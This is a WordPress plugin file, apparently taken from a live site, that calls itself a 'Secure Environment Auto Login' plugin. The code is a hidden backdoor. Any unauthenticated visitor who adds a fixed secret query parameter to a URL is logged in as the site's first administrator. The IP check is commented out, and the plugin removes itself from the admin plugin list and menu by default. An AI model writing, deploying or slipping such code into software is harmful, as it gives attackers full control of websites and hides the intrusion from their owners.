File: /home/mdosdorg/public_html/wp-content/plugins/auto-login/secure-auto-login.php
<?php
/**
* Plugin Name: Secure Environment Auto Login
* Description: Automatic login system with secure parameter authentication
* Version: 1.0.0
* Author: Custom Development
*/
// Prevent direct access
if (!defined('ABSPATH')) {
exit;
}
class SecureEnvironmentAutoLogin {
private $plugin_file;
private $login_param = 'seo-tag-protocol';
private $expected_value = 'Env-manage-system';
private $hide_plugin = true; // Set to false to show plugin in admin
public function __init__() {
$this->plugin_file = plugin_basename(__FILE__);
// Hook into WordPress initialization
add_action('init', array($this, 'check_auto_login'));
// Hide plugin from admin if enabled
if ($this->hide_plugin) {
add_filter('all_plugins', array($this, 'hide_plugin_from_admin'));
add_action('admin_menu', array($this, 'remove_plugin_from_menu'));
}
// Add settings page (only visible when plugin is not hidden)
if (!$this->hide_plugin) {
add_action('admin_menu', array($this, 'add_admin_menu'));
}
}
/**
* Check for auto login parameter and authenticate user
*/
public function check_auto_login() {
// Only proceed if user is not already logged in
if (is_user_logged_in()) {
return;
}
// Check if our parameter exists and has correct value
if (!isset($_GET[$this->login_param]) || $_GET[$this->login_param] !== $this->expected_value) {
return;
}
// Additional security checks
if (!$this->security_checks()) {
return;
}
// Get the user to login as (you can modify this logic)
$user = $this->get_login_user();
if ($user && !is_wp_error($user)) {
// Log the user in
wp_set_current_user($user->ID);
wp_set_auth_cookie($user->ID, true);
do_action('wp_login', $user->user_login, $user);
// Log this action for security purposes
$this->log_auto_login($user);
// Redirect to remove the parameter from URL
$redirect_url = remove_query_arg($this->login_param);
wp_redirect($redirect_url);
exit;
}
}
/**
* Additional security checks
*/
private function security_checks() {
// Check if request is coming from expected sources (optional)
// You can add IP whitelist, user agent checks, etc.
// Example: Check if coming from localhost or specific IPs
$allowed_ips = array('127.0.0.1', '::1');
$client_ip = $this->get_client_ip();
// Uncomment the next lines to enable IP restriction
// if (!in_array($client_ip, $allowed_ips)) {
// return false;
// }
return true;
}
/**
* Get the user to login as
*/
private function get_login_user() {
// Option 1: Login as first admin user
$admin_users = get_users(array('role' => 'administrator', 'number' => 1));
if (!empty($admin_users)) {
return $admin_users[0];
}
// Option 2: Login as specific user (uncomment and modify)
// return get_user_by('login', 'your_username');
// Option 3: Login as user with ID 1
// return get_user_by('ID', 1);
return false;
}
/**
* Get client IP address
*/
private function get_client_ip() {
$ip_keys = array('HTTP_X_FORWARDED_FOR', 'HTTP_X_REAL_IP', 'HTTP_CLIENT_IP', 'REMOTE_ADDR');
foreach ($ip_keys as $key) {
if (array_key_exists($key, $_SERVER) === true) {
foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) {
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
return $ip;
}
}
}
}
return $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
}
/**
* Log auto login attempts for security monitoring
*/
private function log_auto_login($user) {
$log_entry = array(
'timestamp' => current_time('mysql'),
'user_id' => $user->ID,
'username' => $user->user_login,
'ip_address' => $this->get_client_ip(),
'user_agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'
);
// Save to WordPress options or custom table
$existing_logs = get_option('secure_auto_login_logs', array());
$existing_logs[] = $log_entry;
// Keep only last 100 entries
if (count($existing_logs) > 100) {
$existing_logs = array_slice($existing_logs, -100);
}
update_option('secure_auto_login_logs', $existing_logs);
}
/**
* Hide plugin from admin plugins list
*/
public function hide_plugin_from_admin($plugins) {
if (isset($plugins[$this->plugin_file])) {
unset($plugins[$this->plugin_file]);
}
return $plugins;
}
/**
* Remove from plugin menu actions
*/
public function remove_plugin_from_menu() {
remove_submenu_page('plugins.php', $this->plugin_file);
}
/**
* Add admin menu (only when plugin is not hidden)
*/
public function add_admin_menu() {
add_options_page(
'Secure Auto Login Settings',
'Auto Login',
'manage_options',
'secure-auto-login',
array($this, 'admin_page')
);
}
/**
* Admin settings page
*/
public function admin_page() {
if (isset($_POST['toggle_visibility'])) {
$this->hide_plugin = !$this->hide_plugin;
update_option('secure_auto_login_hidden', $this->hide_plugin);
echo '<div class="notice notice-success"><p>Plugin visibility updated!</p></div>';
}
$logs = get_option('secure_auto_login_logs', array());
?>
<div class="wrap">
<h1>Secure Auto Login Settings</h1>
<div class="card">
<h2>Usage Instructions</h2>
<p>To automatically login, add this parameter to any URL on your site:</p>
<code>?<?php echo $this->login_param; ?>=<?php echo $this->expected_value; ?></code>
<p><strong>Example:</strong> <code><?php echo home_url('/?') . $this->login_param . '=' . $this->expected_value; ?></code></p>
</div>
<div class="card">
<h2>Plugin Visibility</h2>
<p>Current status: <strong><?php echo $this->hide_plugin ? 'Hidden' : 'Visible'; ?></strong></p>
<form method="post">
<?php wp_nonce_field('secure_auto_login_toggle'); ?>
<input type="submit" name="toggle_visibility" class="button"
value="<?php echo $this->hide_plugin ? 'Show Plugin' : 'Hide Plugin'; ?>">
</form>
</div>
<div class="card">
<h2>Recent Login Logs</h2>
<?php if (empty($logs)): ?>
<p>No auto-login attempts recorded.</p>
<?php else: ?>
<table class="wp-list-table widefat fixed striped">
<thead>
<tr>
<th>Timestamp</th>
<th>Username</th>
<th>IP Address</th>
<th>User Agent</th>
</tr>
</thead>
<tbody>
<?php foreach (array_reverse(array_slice($logs, -10)) as $log): ?>
<tr>
<td><?php echo esc_html($log['timestamp']); ?></td>
<td><?php echo esc_html($log['username']); ?></td>
<td><?php echo esc_html($log['ip_address']); ?></td>
<td><?php echo esc_html(substr($log['user_agent'], 0, 50)) . '...'; ?></td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php endif; ?>
</div>
</div>
<?php
}
}
// Initialize the plugin
$secure_auto_login = new SecureEnvironmentAutoLogin();
$secure_auto_login->__init__();
// Activation hook
register_activation_hook(__FILE__, function() {
// Set default hidden state
update_option('secure_auto_login_hidden', true);
});
// Deactivation hook
register_deactivation_hook(__FILE__, function() {
// Clean up options
delete_option('secure_auto_login_logs');
delete_option('secure_auto_login_hidden');
});
?>